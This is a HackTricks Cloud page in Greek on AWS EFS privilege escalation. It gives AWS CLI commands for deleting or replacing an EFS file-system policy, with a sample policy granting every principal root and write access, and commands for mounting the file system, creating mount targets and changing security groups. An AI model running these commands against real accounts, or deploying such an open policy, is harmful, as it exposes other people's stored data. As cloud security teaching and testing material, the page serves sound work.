AWS - EFS Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EFS

Περισσότερες πληροφορίες σχετικά με το EFS στο:

Θυμηθείτε ότι για να συνδέσετε ένα EFS πρέπει να βρίσκεστε σε ένα υποδίκτυο όπου το EFS είναι εκτεθειμένο και να έχετε πρόσβαση σε αυτό (ομάδες ασφαλείας). Αν αυτό συμβαίνει, από προεπιλογή, θα μπορείτε πάντα να το συνδέσετε, ωστόσο, αν προστατεύεται από πολιτικές IAM, χρειάζεστε τις επιπλέον άδειες που αναφέρονται εδώ για να έχετε πρόσβαση σε αυτό.

`elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`

Με οποιαδήποτε από αυτές τις άδειες, ένας επιτιθέμενος μπορεί να αλλάξει την πολιτική του συστήματος αρχείων για να σας δώσει πρόσβαση σε αυτό, ή απλώς να το διαγράψει ώστε να παραχωρηθεί η προεπιλεγμένη πρόσβαση.

Για να διαγράψετε την πολιτική:

aws efs delete-file-system-policy \
--file-system-id <value>

Για να το αλλάξετε:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
"Statement": [
{
"Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:ClientRootAccess",
"elasticfilesystem:ClientWrite",
"elasticfilesystem:ClientMount"
],
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget": "true"
}
}
}
]
}

`elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`

Με αυτή την άδεια, ένας επιτιθέμενος θα είναι σε θέση να συνδέσει το EFS. Εάν η άδεια εγγραφής δεν παρέχεται από προεπιλογή σε όλους όσους μπορούν να συνδέσουν το EFS, θα έχει μόνο πρόσβαση ανάγνωσης.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

Οι επιπλέον άδειες elasticfilesystem:ClientRootAccess και elasticfilesystem:ClientWrite μπορούν να χρησιμοποιηθούν για να γράψουν μέσα στο σύστημα αρχείων αφού έχει προσαρτηθεί και να προσεγγίσουν αυτό το σύστημα αρχείων ως root.

Πιθανές Επιπτώσεις: Έμμεση εκμετάλλευση δικαιωμάτων εντοπίζοντας ευαίσθητες πληροφορίες στο σύστημα αρχείων.

`elasticfilesystem:CreateMountTarget`

Αν ένας επιτιθέμενος βρίσκεται σε ένα υποδίκτυο όπου δεν υπάρχει στόχος προσαρτήσεως του EFS. Θα μπορούσε απλά να δημιουργήσει έναν στο υποδίκτυό του με αυτή την άδεια:

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
--subnet-id <value> \
--security-groups <value>

Πιθανές Επιπτώσεις: Έμμεσος privesc εντοπίζοντας ευαίσθητες πληροφορίες στο σύστημα αρχείων.

`elasticfilesystem:ModifyMountTargetSecurityGroups`

Σε ένα σενάριο όπου ένας επιτιθέμενος διαπιστώνει ότι το EFS έχει σημείο προσάρτησης στο υποδίκτυό του αλλά κανένας κανόνας ασφαλείας δεν επιτρέπει την κίνηση, θα μπορούσε απλά να αλλάξει αυτό τροποποιώντας τις επιλεγμένες ομάδες ασφαλείας:

aws efs modify-mount-target-security-groups \
--mount-target-id <value> \
--security-groups <value>

Πιθανές Επιπτώσεις: Έμμεση ανύψωση δικαιωμάτων εντοπίζοντας ευαίσθητες πληροφορίες στο σύστημα αρχείων.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - ECS Privesc NextAWS - Elastic Beanstalk Privesc

Last updated 3 days ago